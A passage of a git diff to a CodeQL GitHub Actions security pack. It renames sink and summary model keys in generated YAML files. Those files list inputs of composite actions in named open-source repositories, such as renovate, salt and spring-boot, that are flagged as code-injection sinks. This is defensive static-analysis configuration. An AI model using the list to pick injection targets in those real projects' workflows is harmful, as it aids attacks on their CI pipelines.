b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 5401d1760513..1937367debc7 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index 70cf81f1b787..01b77b7ccc6d 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] - ["rethinkdb/rethinkdb", "*", "input.install_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index eccccba83feb..edbd28d401bf 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] - ["risc0/risc0", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index b7133aae3049..4b31bd66c5a6 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] - ["rocketchat/rocket.chat", "*", "input.release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 26d7b4482695..a186fa070b0b 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] - ["rook/rook", "*", "input.kubernetes-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 7600cd4bddeb..92ee2971e3a2 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index dd79b0845dd7..07b8e96bfe29 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 71bdd0014586..2a2a5baab45d 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] - ["ruby/ruby", "*", "input.srcdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 3b3262f93a90..274fab01e921 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index b30d898dcc17..3671de9e58af 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] - ["saltstack/salt", "*", "input.upload-chunk-size", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index 963518a34784..2ef34dac8ba7 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 979a9aca5c25..d76f20031e7e 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index b180a319baaa..eccb5dae2bd7 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] - ["scala-native/scala-native", "*", "input.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index fb5fa4d8e4e6..3cbd3330ccd1 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] - ["scitools/iris", "*", "input.install_packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index cb9faef2bf68..73c9c1f24a2b 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] - ["scylladb/scylla-operator", "*", "input.githubToken", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index e7eb6b732ffb..90c4f699308a 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] - ["shader-slang/slang", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index a1b1a4b71e82..ed4e8820c998 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] - ["shaka-project/shaka-player", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index 2463b4a1d167..df51b9fe4c84 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] - ["shakacode/react-webpack-rails-tutorial", "*", "input.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 87e88b2c13d5..8fca8591ceb6 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index c0789d6e4241..819728cf7187 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] - ["slint-ui/slint", "*", "input.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index f617b9d172d5..d3eaca780b40 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] - ["solidusio/solidus", "*", "input.labels", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index f30719d58d8f..42c00ea216b4 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index 84d5c96e63b7..a93d6a039d43 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] - ["sonarr/sonarr", "*", "input.binary_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index d76ab136ab9c..8a7784a6f01e 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] - ["sonic-pi-net/sonic-pi", "*", "input.container-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 9e75660d1b3b..1b22d43bfad8 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 1cc6e837b840..7175dd9450b4 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index b2e283c69830..dca0f00a4ec8 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] - ["spring-io/initializr", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index d08bdb5d6f44..5f75d4fd0cd2 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] - ["spring-io/start.spring.io", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index 4532947bc485..d34a6a1a3885 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-boot", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 518a27d9afc5..b7c5f7e214c1 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-framework", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index bb21bcda68de..eead3b5ace31 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-graphql", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 5f81d9bd4061..be7043cfdbfc 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] - ["square/workflow-kotlin", "*", "input.fix-task", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index f8fe2344d0a3..36bdef9ad9ae 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] - ["stefanprodan/podinfo", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 377e439049c8..3d66b07df9f1 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 70b2c362464e..2f8a3fbdfa6f 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index 7f317ddad8e6..e1acb54c7247 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index b1a9ea20344f..0a51c7087996 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] - ["swagger-api/swagger-codegen", "*", "input.spec-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index 37e39efd2433..0ee56c05777d 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] - ["swagger-api/swagger-parser", "*", "input.parserSpecPath", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index 9569d47329fb..f17216cf1e8c 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] - ["tarantool/tarantool", "*", "input.chat-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index 6cf5dd84fbd7..551010c6634d 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index ce09307f8fb4..bd64e336c171 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] - ["tensorflow/datasets", "*", "input.tf-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 183319e32ff8..7d5454518675 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index d8fb3f98b094..1ad4a2b824df 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] - ["toeverything/affine", "*", "input.nmHoistingLimits", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index c0c663e69f38..60381d41f16b 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] - ["treeverse/lakefs", "*", "input.compose-directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index 35c0d80a115b..ac61ed797d52 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] - ["trezor/trezor-firmware", "*", "input.model", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index dc1dcff0b152..7eed41f755ed 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] - ["tribler/tribler", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index 2da63c894fc4..f977f6a5cce1 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] - ["trunk-io/trunk-action", "*", "input.post-init", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index 3dc87b3ed761..c4bacdc9c2c7 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index 94a140a9fe17..f4ee49207979 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git 